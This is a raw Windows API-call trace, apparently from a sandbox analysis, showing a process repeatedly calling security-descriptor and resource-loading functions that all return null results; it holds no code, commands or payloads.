[0219.796] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.796] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.796] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.796] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.796] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.796] LockResource (hResData=0x0) returned 0x0 [0219.796] FreeResource (hResData=0x0) returned 0 [0219.796] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.796] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.797] LockResource (hResData=0x0) returned 0x0 [0219.797] FreeResource (hResData=0x0) returned 0 [0219.797] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.797] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.797] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.797] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.797] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.797] LockResource (hResData=0x0) returned 0x0 [0219.797] FreeResource (hResData=0x0) returned 0 [0219.797] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.797] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.797] LockResource (hResData=0x0) returned 0x0 [0219.797] FreeResource (hResData=0x0) returned 0 [0219.797] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.797] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.797] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.797] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.797] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.797] LockResource (hResData=0x0) returned 0x0 [0219.797] FreeResource (hResData=0x0) returned 0 [0219.797] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.797] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.797] LockResource (hResData=0x0) returned 0x0 [0219.797] FreeResource (hResData=0x0) returned 0 [0219.797] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.797] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.797] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.797] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.797] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.797] LockResource (hResData=0x0) returned 0x0 [0219.797] FreeResource (hResData=0x0) returned 0 [0219.797] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.797] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.797] LockResource (hResData=0x0) returned 0x0 [0219.797] FreeResource (hResData=0x0) returned 0 [0219.797] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.797] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.797] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.797] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.797] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.797] LockResource (hResData=0x0) returned 0x0 [0219.797] FreeResource (hResData=0x0) returned 0 [0219.797] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.797] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.797] LockResource (hResData=0x0) returned 0x0 [0219.797] FreeResource (hResData=0x0) returned 0 [0219.797] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.797] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.798] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.798] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.798] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.798] LockResource (hResData=0x0) returned 0x0 [0219.798] FreeResource (hResData=0x0) returned 0 [0219.798] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.798] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.798] LockResource (hResData=0x0) returned 0x0 [0219.798] FreeResource (hResData=0x0) returned 0 [0219.798] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.798] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.798] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.798] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.798] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.798] LockResource (hResData=0x0) returned 0x0 [0219.798] FreeResource (hResData=0x0) returned 0 [0219.798] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.798] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.798] LockResource (hResData=0x0) returned 0x0 [0219.798] FreeResource (hResData=0x0) returned 0 [0219.798] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.798] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.798] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.798] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.798] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.798] LockResource (hResData=0x0) returned 0x0 [0219.798] FreeResource (hResData=0x0) returned 0 [0219.798] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.798] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.798] LockResource (hResData=0x0) returned 0x0 [0219.798] FreeResource (hResData=0x0) returned 0 [0219.798] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.798] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.798] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.798] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.798] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.798] LockResource (hResData=0x0) returned 0x0 [0219.798] FreeResource (hResData=0x0) returned 0 [0219.798] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.798] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.798] LockResource (hResData=0x0) returned 0x0 [0219.798] FreeResource (hResData=0x0) returned 0 [0219.798] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.798] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.798] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.798] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.798] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.798] LockResource (hResData=0x0) returned 0x0 [0219.798] FreeResource (hResData=0x0) returned 0 [0219.799] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.799] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.799] LockResource (hResData=0x0) returned 0x0 [0219.799] FreeResource (hResData=0x0) returned 0 [0219.799] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.799] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.799] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.799] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.799] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.799] LockResource (hResData=0x0) returned 0x0 [0219.799] FreeResource (hResData=0x0) returned 0 [0219.799] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.799] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.799] LockResource (hResData=0x0) returned 0x0 [0219.799] FreeResource (hResData=0x0) returned 0 [0219.799] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.799] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.799] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.799] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.799] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.799] LockResource (hResData=0x0) returned 0x0 [0219.799] FreeResource (hResData=0x0) returned 0 [0219.799] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.799] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.799] LockResource (hResData=0x0) returned 0x0 [0219.799] FreeResource (hResData=0x0) returned 0 [0219.799] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.799] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.799] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.799] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.799] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.799] LockResource (hResData=0x0) returned 0x0 [0219.799] FreeResource (hResData=0x0) returned 0 [0219.799] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.799] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.799] LockResource (hResData=0x0) returned 0x0 [0219.799] FreeResource (hResData=0x0) returned 0 [0219.799] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.799] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.799] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.799] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.799] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.799] LockResource (hResData=0x0) returned 0x0 [0219.799] FreeResource (hResData=0x0) returned 0 [0219.799] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.799] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.799] LockResource (hResData=0x0) returned 0x0 [0219.799] FreeResource (hResData=0x0) returned 0 [0219.800] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.800] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.800] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.800] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.800] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.800] LockResource (hResData=0x0) returned 0x0 [0219.800] FreeResource (hResData=0x0) returned 0 [0219.800] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.800] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.800] LockResource (hResData=0x0) returned 0x0 [0219.800] FreeResource (hResData=0x0) returned 0 [0219.800] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.800] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.800] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.800] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.800] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.800] LockResource (hResData=0x0) returned 0x0 [0219.800] FreeResource (hResData=0x0) returned 0 [0219.800] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.800] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.800] LockResource (hResData=0x0) returned 0x0 [0219.800] FreeResource (hResData=0x0) returned 0 [0219.800] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.800] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.800] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.800] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.800] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.800] LockResource (hResData=0x0) returned 0x0 [0219.800] FreeResource (hResData=0x0) returned 0 [0219.800] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.800] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.800] LockResource (hResData=0x0) returned 0x0 [0219.800] FreeResource (hResData=0x0) returned 0 [0219.800] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.800] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.800] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.800] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.800] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.800] LockResource (hResData=0x0) returned 0x0 [0219.800] FreeResource (hResData=0x0) returned 0 [0219.800] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.800] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.800] LockResource (hResData=0x0) returned 0x0 [0219.800] FreeResource (hResData=0x0) returned 0 [0219.800] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.800] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.800] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.800] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.801] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.801] LockResource (hResData=0x0) returned 0x0 [0219.801] FreeResource (hResData=0x0) returned 0 [0219.801] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.801] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.801] LockResource (hResData=0x0) returned 0x0 [0219.801] FreeResource (hResData=0x0) returned 0 [0219.801] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.801] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.801] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.801] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.801] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.801] LockResource (hResData=0x0) returned 0x0 [0219.801] FreeResource (hResData=0x0) returned 0 [0219.801] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.801] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.801] LockResource (hResData=0x0) returned 0x0 [0219.801] FreeResource (hResData=0x0) returned 0 [0219.801] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.801] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.801] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.801] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.801] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.801] LockResource (hResData=0x0) returned 0x0 [0219.801] FreeResource (hResData=0x0) returned 0 [0219.801] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.801] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.801] LockResource (hResData=0x0) returned 0x0 [0219.801] FreeResource (hResData=0x0) returned 0 [0219.801] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.801] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.801] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.801] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.801] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.801] LockResource (hResData=0x0) returned 0x0 [0219.801] FreeResource (hResData=0x0) returned 0 [0219.801] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.801] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.801] LockResource (hResData=0x0) returned 0x0 [0219.801] FreeResource (hResData=0x0) returned 0 [0219.801] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.801] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.801] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.801] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.801] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.801] LockResource (hResData=0x0) returned 0x0 [0219.801] FreeResource (hResData=0x0) returned 0 [0219.801] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.801] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.801] LockResource (hResData=0x0) returned 0x0 [0219.802] FreeResource (hResData=0x0) returned 0 [0219.802] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.802] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.802] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.802] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.802] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.802] LockResource (hResData=0x0) returned 0x0 [0219.802] FreeResource (hResData=0x0) returned 0 [0219.802] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.802] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.802] LockResource (hResData=0x0) returned 0x0 [0219.802] FreeResource (hResData=0x0) returned 0 [0219.802] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.802] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.802] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.802] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.802] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.802] LockResource (hResData=0x0) returned 0x0 [0219.802] FreeResource (hResData=0x0) returned 0 [0219.802] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.802] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.802] LockResource (hResData=0x0) returned 0x0 [0219.802] FreeResource (hResData=0x0) returned 0 [0219.802] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.802] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.802] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.802] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.802] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.802] LockResource (hResData=0x0) returned 0x0 [0219.802] FreeResource (hResData=0x0) returned 0 [0219.802] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.802] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.802] LockResource (hResData=0x0) returned 0x0 [0219.802] FreeResource (hResData=0x0) returned 0 [0219.802] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, 